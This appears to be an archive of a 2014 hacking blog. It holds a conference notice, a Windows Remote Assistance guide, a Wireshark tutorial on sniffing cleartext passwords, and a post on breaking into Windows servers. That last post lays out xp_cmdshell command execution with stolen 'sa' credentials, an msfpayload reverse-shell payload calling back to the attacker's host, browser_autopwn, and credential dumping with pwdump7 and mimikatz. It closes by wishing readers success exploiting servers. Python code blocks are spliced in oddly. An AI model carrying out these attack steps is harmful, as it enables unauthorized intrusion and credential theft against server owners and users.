Stuff for Braines

Tuesday, 12 August 2014

Embedasia 2014 - International Conference on Embedded Systems


Attention readers, we have news for you!


CFEI is organizing the “Automotive Embedded Challenge” (AEC) on September 20th 2014 at IISc Bangalore.

Center for Embedded Intelligence (CFEI) is a professional group of embedded-systems engineers that aims to support the continued growth of the Indian economy through its technology and its people. CFEI focuses on innovative designs for embedded products and solutions, and on core embedded-systems training and conferences. The Center was set up to conduct cutting-edge research in embedded-system technology and its application in telecom, avionics, defence, automotive, consumer electronics and other domains. CFEI intends to promote the highest standards of embedded-system technology.

The Automotive Embedded Challenge (AEC) aims to identify, promote and reward outstanding engineering talent across India. The contest is open to all engineering students in India and is the first event of its kind to be organized in the country.

The contest provides a level playing field for every budding engineer in the automotive field to display his or her technical brilliance. It also lets engineering students develop their presentation and marketing skills by pitching ideas of their choice to a review panel.

Through a rigorous and challenging selection process, a distinguished panel of judges comprising academic and industry leaders will select the top thirty entries from a nationwide pool of thousands to attend the final round in Bangalore on September 20th 2014.

A comprehensive case study will be made of each of the winning presentations, and the winners and their ideas will be announced to the press and media.

This is a great opportunity for your students to present an idea on automotive embedded systems, and registration is FREE.

 For more details please click here: http://www.embedasia.com/Asc.html

 Regards,
CFEI Team.

+91-99867268828
Facebook  URL : http://tinyurl.com/lfoemhp

Linkedin URL: http://tinyurl.com/paplh44

Twitter  URL: http://tinyurl.com/lproyx8

Thursday, 13 February 2014

REMOTE SCREEN SHARING

HOW TO SHARE REMOTE SCREENS AND CONTROL PC WITHOUT ANY SOFTWARE IN WINDOWS


Remote sharing is at its peak these days: people use it to provide live support or simply to share screens. Most of us reach for third-party software such as TeamViewer or Radmin to share or control remote systems. Today I am going to show you how to connect two (or more) Windows PCs remotely without any third-party tool, so let's learn how to share screens with what Windows already ships.

Windows Remote Assistance without any external software


As we all know, Windows is full of built-in programs that only developers or geeks tend to use. Today we are going to look at MSRA (Windows Remote Assistance). MSRA is the remote assistance program built into Windows; with it you can control a remote PC, share a remote screen, provide remote support and more. Let's learn how to use MSRA for remote sharing.

Steps to Share or Control Remote PC using MSRA:


1. First of all, click Start, type "msra" in the search box and press Enter, as shown below:


Type msra in the search box


2. You will now see a window titled "Windows Remote Assistance" with two options:

a. Invite someone you trust to help you: choose this option if you want to share your screen with someone.
b. Help someone who invited you: choose this option if you want to control someone else's PC remotely.

Click option a, "Invite someone you trust to help you", to share your screen:


invite someone to provide remote assistance
Select shown option to continue


Once you click that option you will see the panel below, with several choices:


Options displayed for Windows Remote Assistance

Now you can see three different options:
a. Save this invitation as a file: this saves an invitation file (.msrcincident) that you send to the person you want help from. After saving, another window opens showing the password; the helper needs both the file and this password to connect, so treat the two as secrets and ideally send them over different channels. Invitations expire (by default after 6 hours).

b. Use email to send an invitation: sends the invitation directly by email, but it requires a mail client such as Outlook installed on your machine.

c. Use Easy Connect: another way to connect two PCs directly, but it depends on IPv6 connectivity (it uses the Peer Name Resolution Protocol). If IPv6 is disabled or the computer is behind a NAT router that blocks Teredo traffic, the Easy Connect option will be unavailable.


Once you have sent the invitation file to the helper, he or she connects to your PC by double-clicking the invitation file and entering the password. You will then be asked to confirm the connection, and asked again before the helper is allowed to take control of your mouse and keyboard.

Note: Remote Assistance must be enabled on the machine being helped. Open System Properties > Remote and tick "Allow Remote Assistance connections to this computer"; this also enables the Remote Assistance exceptions in Windows Firewall.

3. Help someone who invited you: choose this option to help anyone who has done the steps above. You will need two things to connect to the remote PC: the invitation file and the password.



There is another handy option: you can connect directly to a PC using its IP address. Windows Remote Assistance supports this too (it is the "Offer Remote Assistance" mode used by help desks). Here are the steps.


1. First of all, click Start, type "msra" and press Enter.

2. In the window with two options, select "Help someone who invited you".
3. You will now see a few options; click the bottom one, "Advanced connection option for help desk", as shown below:

Select advanced connection option for help desk

After clicking option you see below panel to enter IP address:

Enter IP address or computer name

After entering the IP address or computer name, press Next to connect. Note that this only works if the remote computer accepts unsolicited offers: the "Offer Remote Assistance" Group Policy setting (Computer Configuration > Administrative Templates > System > Remote Assistance) must be enabled there and your account must be listed as a helper, which is why this mode is mostly used inside a domain. The user at the other end still has to accept the connection.

Hope you all enjoyed the learning. If you have any queries, ask me in the comments.

See more at: https://www.stuffforbraines.blogspot.com

join us at https://www.facebook.com/StuffforBraines

Sunday, 9 February 2014

How To Capture Passwords Across The Air Network Traffic Analysis






ABSTRACT

     It is well known that Wireshark is a powerful tool that goes far beyond a simple sniffer. What many do not know is that there are several ways to harness its potential, and that is what this article aims to introduce. We will learn to sniff the network effectively, build filters to find only the information we want, see how a black hat would use the tool to steal passwords, and finally how to use Wireshark to diagnose network problems or to verify that a firewall is blocking packets correctly.

INTRODUCTION

     Today it is very unlikely that your password will be brute-forced. Instead, you use the Internet as usual and one day you are surprised by accusations of an intrusion: the evidence shows that attacks on third parties' accounts came from your account, and you have no idea what is happening. Someone has used your account and acted as you. How could this happen? A strong possibility is that you have become the victim of a "sniffer".

UNDERSTAND THE MAIN CONCEPT

     What are "sniffers"? The main purpose of a sniffer is to capture network traffic. They are used for legitimate network analysis, but they can also be used by malicious hackers to capture your passwords; intrusion detection systems (IDS) are themselves built on network sniffers.

     These programs let you monitor network activity and record data (usernames, passwords, etc.) each time a user accesses another computer on the network.

     They aim to monitor ("sniff") traffic to the network services users log into, such as remote mail (IMAP, POP3), remote access (telnet, rlogin, etc.) and file transfer (FTP), capturing the packets and keeping the most relevant information.
     When a computer connected to a hub sends data to another computer, the hub repeats that data out of every port, so it reaches every machine. Normally only the machine the data is addressed to passes it up to its operating system; the others discard it.

     If a sniffer is running on one of the other computers, it puts the network interface into promiscuous mode, intercepts the data at the link layer even though it was not addressed to that machine, and shows it to the user, usually in a fairly raw form. The data is generally organized by protocol (TCP, UDP, FTP, ICMP, etc.) and the content of each packet can be displayed.


YOUR PASSWORD CAN BE CAPTURED BY SNIFFERS!

     Many local area networks (LANs) share the same Ethernet segment, so virtually any computer on the network can run a "sniffer" to "steal" users' passwords. Sniffers work by monitoring the traffic between computers and waiting for someone to use one of the network services mentioned above. Each of these services uses a protocol that defines how a session is established, how your account is identified and authenticated, and how the service is used.
     To access these services you first have to log in. The login sequence is part of the authentication protocol and occurs at the beginning of each session; this is the part sniffers care about, because it carries your password. Filtering the stream for a few key strings (for POP3 and FTP, the USER and PASS commands) is all it takes to obtain it.


STEP BY STEP

     Nowadays almost all environments use switches rather than hubs, which makes sniffing a little harder: a switch does not send data to every port as a hub does, but only to the port where the destination host is. If you sniff on a switched network you will only see broadcast traffic and your own connections. To see everything without being the network's gateway, you need an ARP spoofing attack (ARP poisoning) to redirect traffic through your machine, or to flood the switch's CAM table (MAC flooding) so that it falls back to hub-like behaviour.

Basic Usage
     Now let's get our hands dirty. I am assuming you already have Wireshark installed; if not, download it. When you start Wireshark the screen will look something like Figure 1:


Figure 1) Wireshark.

     Before you can start capturing packets, we have to define which interface will "listen" to the traffic. Click Capture > Interfaces


Figure 2) Interfaces.

     A new window will appear listing the automatically detected interfaces; select the desired interface by clicking the box next to its name, as in Figure 3:


Figure 3) Capture Interfaces.

     If you click Start, it begins capturing packets on the selected interface immediately.
     When the capture is running you will see packets scrolling past in the Wireshark window (how many depends on the traffic on your machine and network). It will look something like Figure 4:


Figure 4) Capturing.

     To stop the capture, simply click the button, "Stop the running live capture".


Figure 5) Stop.

     Keep in mind that on a busy network the volume of captured data can exhaust memory and make your machine unresponsive, so it is not advisable to leave Wireshark capturing for a long time; as we will see, we will run it only while debugging a connection. The more packets you capture, the longer it takes to apply a filter, find a packet and so on.

     With this we have the basics of the program: we can set the capture interface, and start and stop the capture. The next step is to find what interests us among many packets. For that we will use filters.

Using Filters

     There are a plethora of possible filters, but for now we will just see how to filter by IP address, port and protocol.
Filters can be built by clicking "Filter" and choosing from a short list of pre-defined filters, or by typing directly into the text box. After writing your filter click "Apply"; to see the whole packet list again click "Clear", which removes the filter.



Figure 6) Filter.


     I will use a small filter list as an example:




Figure 7) Example by Chaitanya prakash


     It is also possible to combine filters, for example:
ip.src == 10.10.10.1 && tcp.dstport == 80
which can equally be written as
ip.src == 10.10.10.1 and tcp.dstport == 80

Source address 10.10.10.1
and destination port 80


CAPTURING PASSWORDS

     Now we will see how easily a password can be captured just by listening to the traffic. For this example we will use POP3, which sends everything in clear text over the network. Start a capture as before and open a session to your POP3 mail server. If you use a safer protocol such as IMAPS or POP3S you will not see a password; the point here is only to see how the mechanism works.

     Now stop the capture, type "pop" in the filter box and click "Apply"; you now see only the packets of the POP3 connection. Right-click any of them and choose "Follow TCP Stream".


Figure 8) POP3.
     This opens a new window with the whole content of the connection as ASCII. Since POP3 sends everything in plain text, you can read every command executed, including the password.


Figure 9) Pass.

     The same technique works on any plain-text connection, such as FTP, Telnet or HTTP: just change the filter and examine the contents of the stream.
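The two steps above, the combined "ip.src && tcp.dstport" filter and "Follow TCP Stream" on a POP3 login, re-created offline as an added example. This is not code from the original post: it builds a small classic-pcap capture in memory (the addresses, MAC addresses and the alice/s3cret! login are constructed), parses it with a minimal Ethernet/IPv4/TCP parser, applies the same AND-of-fields test Wireshark's display filter performs, and pulls USER/PASS out of the client-to-server direction. The same function works for FTP on port 21, since FTP uses the same two commands.

```python
"""Offline re-creation of the Wireshark steps: build a pcap, filter it, extract POP3/FTP credentials.
The capture below is constructed for illustration; addresses and credentials are made up."""
import socket
import struct

MAC_A, MAC_B = bytes.fromhex("0a0000000001"), bytes.fromhex("0a0000000002")  # constructed


def tcp_frame(src, sport, dst, dport, payload, seq=1):
    """Ethernet + IPv4 + TCP frame. Checksums are left zero: the parser below ignores them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + tcp
    return MAC_B + MAC_A + b"\x08\x00" + ip


def build_pcap(frames):
    """Classic libpcap file: 24-byte global header, then a 16-byte record header per frame."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_400_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def parse_pcap(data):
    """Return one dict per IPv4/TCP frame, keyed with Wireshark-style field names."""
    if struct.unpack_from("<I", data, 0)[0] != 0xA1B2C3D4:
        raise ValueError("only little-endian classic pcap is handled here")
    pkts, off = [], 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from("<IIII", data, off)
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue  # not IPv4
        ip = frame[14:]
        ihl, total_len, proto = (ip[0] & 0x0F) * 4, struct.unpack_from("!H", ip, 2)[0], ip[9]
        if proto != 6:
            continue  # not TCP
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        pkts.append({"ip.src": socket.inet_ntoa(ip[12:16]), "ip.dst": socket.inet_ntoa(ip[16:20]),
                     "tcp.srcport": sport, "tcp.dstport": dport,
                     "payload": tcp[(tcp[12] >> 4) * 4:]})  # data offset is in the high nibble
    return pkts


def display_filter(pkts, **conds):
    """AND of field == value tests, like 'ip.src == 10.10.10.1 && tcp.dstport == 80'."""
    return [p for p in pkts if all(p[field] == value for field, value in conds.items())]


def cleartext_creds(pkts, port):
    """What 'Follow TCP Stream' shows for POP3 (110) or FTP (21): USER/PASS sent in the clear."""
    found = {}
    for p in display_filter(pkts, **{"tcp.dstport": port}):
        key = (p["ip.src"], p["ip.dst"])
        for line in p["payload"].decode("ascii", "replace").splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() in ("USER", "PASS"):
                found.setdefault(key, {})[cmd.upper()] = arg
    return [(src, dst, v.get("USER"), v.get("PASS")) for (src, dst), v in found.items()]


# Constructed POP3 login plus one unrelated HTTP request, as a capture file in memory.
C, S, WEB = "10.10.10.1", "10.10.10.2", "10.10.10.3"
SAMPLE_PCAP = build_pcap([
    tcp_frame(S, 110, C, 51000, b"+OK POP3 server ready\r\n"),
    tcp_frame(C, 51000, S, 110, b"USER alice\r\n"),
    tcp_frame(S, 110, C, 51000, b"+OK\r\n"),
    tcp_frame(C, 51000, S, 110, b"PASS s3cret!\r\n"),
    tcp_frame(S, 110, C, 51000, b"+OK Logged in.\r\n"),
    tcp_frame(C, 51001, WEB, 80, b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"),
])

if __name__ == "__main__":
    pkts = parse_pcap(SAMPLE_PCAP)
    web = display_filter(pkts, **{"ip.src": C, "tcp.dstport": 80})
    print(len(web), "packet(s) match ip.src == 10.10.10.1 && tcp.dstport == 80")
    for src, dst, user, password in cleartext_creds(pkts, 110):
        print(f"POP3 {src} -> {dst}: USER={user} PASS={password}")
```

Writing SAMPLE_PCAP to a file and opening it in Wireshark reproduces Figures 8 and 9; the same logic, pointed at a real capture, is also the simplest detector for cleartext logins still in use on a network.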

Importing External Captures

     Servers usually have no graphical environment installed, so you cannot use Wireshark directly on them. If you need to analyze traffic on such a server and cannot install Wireshark, the best option is to record the traffic locally with tcpdump and copy the dump to a machine with Wireshark for detailed analysis.

     We will capture everything exchanged between the host 10.10.10.1 and destination port 80 and save it to the file capture*****.pcap in the directory where the command is run. Run on the server:

tcpdump -i eth0 host 10.10.10.1 and dst port 80 -w capture*****.pcap

     When you have finished capturing, press Ctrl+C to stop tcpdump, copy the file (for example with scp) to the machine running Wireshark and open it with File -> Open (File -> Import is only for text hex dumps). Once loaded, you can use the program exactly as if the capture had been made locally.


EVOLUTION OF THINKING

Why steal your password?

     There are many reasons people steal passwords, from simply annoying someone (sending email as you) to carrying out illegal activities (breaking into other computers, stealing information, etc.). What attracts crackers is the ability to use someone else's identity for these activities.

     One of the main reasons attackers break into systems and install "sniffers" is to harvest as many accounts as possible, as quickly as possible. The more accounts an attacker has, the easier it is to hide their tracks.

How can you protect yourself?

     Do not think that "sniffers" make the whole Internet insecure. They do not. You need to be aware of where the risk is, when you are at risk and what to do to be safe.

     When your credit card is stolen or you suspect someone is misusing it, you cancel the card. Likewise, since passwords can be stolen, it is critical that you replace them regularly. This limits the time during which a stolen password can be used by an attacker.

     Never share your password with others. Sharing makes it hard to know where your password is being used (and exposed) and makes unauthorized use harder to detect. A password is like a toothbrush: never share it, and change it regularly.

     Never give your password to anyone claiming they need it to fix a problem with your account or to investigate a breach. This trick, known as "social engineering", is one of the most effective hacking methods.

Use networks you can trust

     Another thing to consider is which networks you can trust and which you cannot. If you are travelling and need to access your organization's computers remotely, you need a high level of assurance that the network you are on is secure. Think of any file in your home directory: would you make it available to an Internet cafe ("LAN house") or to another organization's network? Are you sure you can trust the network?

     If you have no secure remote-access option and only something like telnet is available, you can mitigate the risk by changing your password at the end of each session. Only the first packets (200-300 bytes) of each session carry your login, so if you always change the password before logging out, the password that was exposed on the wire is no longer valid by the time it is used. Of course an attacker can capture everything crossing the network, but they normally have no wish to fill their disk quickly and be discovered that easily.

Why are networks so vulnerable to "sniffers"?

     There are several reasons, and there is no quick fix.

     Part of the problem is that companies tend to invest in new features rather than in security. Security features can make systems harder to configure and less convenient to use. Remember that companies try to balance the C.I.A. triad (confidentiality, integrity and availability); new features have unintended effects on availability, and when that happens policy is overlooked, which in itself creates new vulnerabilities.

     Another part of the problem is the added cost of Ethernet switches, hubs and network interfaces that do not allow the "promiscuous" mode sniffers rely on.


CONCLUSION

     The question that remains is how we can protect ourselves from this threat.


i) Network cards that cannot be put into "promiscuous" mode, so that compromised computers cannot be turned into "sniffers".

ii) Normally an Ethernet interface only passes up to the higher-layer protocols the packets addressed to the local machine. Switching the interface into promiscuous mode makes it accept all packets and pass them up the stack, which is what lets a sniffer pick out what it wants.

iii) Software that encrypts data in transit over the network, so that passwords never flow "in the clear".

     The safest thing to adopt and encourage is software that provides encrypted remote-access sessions; it makes your environment much more secure.

     One common encryption technology for secure communication between remote machines is SSH (Secure Shell), which is available for many platforms. Using it does not prevent your packets from being captured, but what is captured is encrypted and useless to the attacker. SSH authenticates the server and negotiates session keys with public-key cryptography (RSA in the original SSH-1 protocol), and once the connection is set up all traffic is encrypted with a symmetric cipher (IDEA in SSH-1; current SSH-2 implementations use ciphers such as AES or ChaCha20). This encryption is very strong.

     In the future, security will be increasingly intrinsic to systems and network infrastructure. There is no point in having all the security "apparatus" if you do not use it. Nothing can be made completely secure; remember, no one is 100% secure.


Saturday, 18 May 2013

Hacking windows server


                                     





Most of us here can hack websites and servers. But what we hate most is an error message: Access Denied! We know some ways to bypass restrictions on Linux, using symlinks, privilege escalation with local root exploits and similar attacks.

But these only get the job done on Linux servers. What about Windows servers?

Here are some ways to bypass restrictions on Windows servers or to get SYSTEM privileges:
  • Using the "sa" account to execute commands through MSSQL queries via the 'xp_cmdshell' stored procedure.
  • Using a Meterpreter payload to get a reverse shell on the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is the easy way, but the real fun of hacking lies in the first three methods.

1. Using xp_cmdshell-

On Windows servers we often have read permission over the files of other IIS users, which is what this method needs.
If we are lucky, we will find the login credentials of the MSSQL "sa" account inside the web.config of some website.
You must be wondering why "sa" in particular.
"sa" is SQL Server's built-in system administrator login: it is a member of the sysadmin role and has every permission inside the database engine, including the right to run operating-system commands through xp_cmdshell.
The picture below shows a connection string containing the login credentials of the "sa" account.


With these we can log into the MSSQL server locally (through our web backdoor) or remotely. I would recommend remote access because it does not add entries to the web server's logs that would fill the log file with our backdoor's path (the database server itself will still record the login if login auditing is configured).
So, after getting the "sa" account, we can log in remotely using HeidiSQL.
HeidiSQL is an excellent tool for connecting to remote database servers; you can download it here.
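The defender's side of the web.config step above, as an added example that is not part of the original post: a scanner that reads the connectionStrings section of an ASP.NET web.config and flags entries that log in as sa or that carry a SQL-authentication password in clear text. The web.config content, server names and passwords below are constructed for illustration.

```python
"""Audit ASP.NET web.config connection strings for the 'sa' login and clear-text SQL-auth passwords.
The web.config below is constructed for illustration; server names and passwords are made up."""
import xml.etree.ElementTree as ET


def parse_connection_string(cs):
    """Split 'Key=Value;Key=Value' into a dict; keys are lower-cased because ADO.NET accepts several spellings."""
    out = {}
    for part in cs.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            out[key.strip().lower()] = value.strip()
    return out


def audit_web_config(xml_text):
    """Return (name, [issues]) for each <connectionStrings><add> that uses sa or embeds a SQL-auth password."""
    findings = []
    root = ET.fromstring(xml_text)
    for section in root.iter("connectionStrings"):
        for add in section.findall("add"):
            kv = parse_connection_string(add.get("connectionString", ""))
            user = kv.get("user id") or kv.get("uid") or kv.get("user")
            password = kv.get("password") or kv.get("pwd")
            integrated = (kv.get("integrated security") or kv.get("trusted_connection") or "false").lower()
            issues = []
            if user and user.lower() == "sa":
                issues.append("uses the built-in 'sa' login (sysadmin)")
            if password and integrated not in ("true", "sspi", "yes"):
                issues.append("SQL-auth password stored in clear text")
            if issues:
                findings.append((add.get("name"), issues))
    return findings


# Constructed web.config: one sa login, one Windows-auth entry (clean), one low-privilege SQL login.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="ShopDB" providerName="System.Data.SqlClient"
         connectionString="Server=SQL01;Database=Shop;User Id=sa;Password=P@ssw0rd!" />
    <add name="ReportsDB" providerName="System.Data.SqlClient"
         connectionString="Server=SQL01;Database=Reports;Integrated Security=SSPI" />
    <add name="LegacyDB" providerName="System.Data.SqlClient"
         connectionString="Data Source=SQL02;Initial Catalog=Legacy;uid=shop_app;pwd=hunter2" />
  </connectionStrings>
</configuration>"""

if __name__ == "__main__":
    for name, issues in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"{name}: " + "; ".join(issues))
```

The fix on the application side is a dedicated low-privilege SQL login (never sa) or Windows authentication (Integrated Security=SSPI) for the application pool identity, and encrypting the section with aspnet_regiis -pe "connectionStrings" so a file-read primitive like the one in this post yields ciphertext rather than credentials.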

After logging into MSSQL server with sa account, we get a list of databases and their contents.


Now we can execute commands using MSSQL queries via xp_cmdshell. The command runs under the Windows account that the SQL Server service itself uses.

The syntax of the query is:
xp_cmdshell '[command]'

For example, to see my current privileges I would run:
xp_cmdshell 'whoami'


Here this shows that I am NT AUTHORITY\SYSTEM, which as most of us know is the highest-privileged account in Windows. That is the case because this SQL Server service was running as LocalSystem; on servers where the service runs as a dedicated or virtual service account you get that account's privileges instead.
Now we can move on to post-exploitation, such as enabling RDP, adding accounts and allowing them to use RDP.

Note: xp_cmdshell is disabled by default since SQL Server 2005. As sa (or any sysadmin) you can turn it on with sp_configure: enable 'show advanced options', then 'xp_cmdshell', running RECONFIGURE after each. If the procedure has been dropped altogether it can be recreated from xplog70.dll; there are many tutorials for that online.
  
2. Meterpreter Payload-

This method is quite easy and is useful when we cannot read other users' files but can execute commands.
Using Metasploit, generate a reverse-shell payload executable.

For example:
msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

(windows/shell_reverse_tcp would give a plain command shell rather than a Meterpreter session. In current Metasploit releases msfpayload has been replaced by msfvenom, which takes -p for the payload and -f exe for the output format.)

Now we upload this executable to the server using our web backdoor.
Start exploit/multi/handler on our side with the same payload, LHOST and LPORT (make sure the port is forwarded properly).
Now it is time to execute the payload.
If everything goes right, we get a Meterpreter session on the target machine, as shown below.
We can also use PHP, ASP or other payloads.


3. Browser Autopwn-
This seems an odd way to hack a server, but I found it a clever way to get the job done, especially when we are allowed to execute commands but cannot run our own executables (payloads) because of software restriction policies in a domain environment.
Most Windows servers have an outdated Internet Explorer, and we can exploit it if we can execute commands.
I think it is clear by now what I am getting at ;)
We can start Internet Explorer from the command line and make it browse to a specific URL.

The syntax is:
iexplore.exe [URL]

where URL is the address of our server running browser_autopwn. The session this gives us lives inside the browser process, and from there Meterpreter's railgun extension lets us call Windows APIs directly in memory instead of dropping tools to disk, which helps avoid antivirus detection.


4. Using readily available tools-
Tools like pwdump and mimikatz recover the passwords of Windows users.

#pwdump7 dumps the LM and NTLM (NT) hashes of local users from the SAM, which can then be cracked with John the Ripper. The NT hash is an unsalted MD4 of the UTF-16LE password, so dictionary and rainbow-table attacks against it are fast.
The following screenshot shows NTLM hashes from pwdump7:


#mimikatz is another great tool; it extracts the plain-text passwords of logged-on users from the memory of lsass.exe. Its early versions were in French rather than English, so do watch tutorials on how to use it.
The following picture shows plain-text passwords from mimikatz:


You can google them to learn how to use these tools and what they actually exploit to get the job done.

I hope you can now exploit every other Windows server.
Happy Hacking :)